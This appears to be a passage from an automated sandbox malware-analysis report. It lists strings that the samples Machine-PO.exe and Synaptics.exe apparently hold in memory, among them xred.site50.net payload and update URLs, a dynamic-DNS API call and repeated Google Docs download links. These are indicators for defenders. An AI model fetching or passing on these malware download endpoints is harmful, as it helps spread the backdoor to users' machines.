                                  Content-Security-Policy: script-src 'report-sample' 'nonce-YZAeA_VocUk2GA_Rk_TmsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Length: 1652
                                  Server: UploadServer
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978p
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1845982405.000000000F093000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/X
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/google.com/J
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/h
                              Source: Synaptics.exe, 00000003.00000002.1842892634.000000000D73E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1849242482.00000000106FE000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1849421104.000000001097E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1840307122.000000000B57E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841189054.000000000BE3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825291818.00000000079FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1822950617.0000000005D6E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833943337.000000000A03E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1847366378.00000000100BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834102292.000000000A17E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841534058.000000000C33E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1839261008.000000000AB7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841267999.000000000BF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821333577.000000000539E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1829158147.000000000823E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1846392989.000000000F6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834746512.000000000A3FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1843620950.000000000DD7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1831297871.00000000094FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1820291042.00000000046AE000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$=
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$x
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%A.0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&g
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(-32%
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(i_1
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(m~1-
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(q
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)D:3/
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-7X
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-C&2
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-O
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.bdn.4i_0
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com/pki/crl/)7Y
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.tr
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/I
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/r
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0/
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download02
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download03P
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download06P
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0:
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0;qK0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0=
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0I
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0P
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0c
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0r
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0x
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1.
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1A20
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1Z
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1c%
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download27Y
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2g
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download37Y
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4w80
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4~6
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5l
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5p
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download64
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download67Y
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7G
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7J
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8?
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8G
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8J
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8hO0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9141
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9CJ2#
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;O
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=B61
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=q
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?H
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAC
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBI
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBr
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDH
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDy
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEB
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
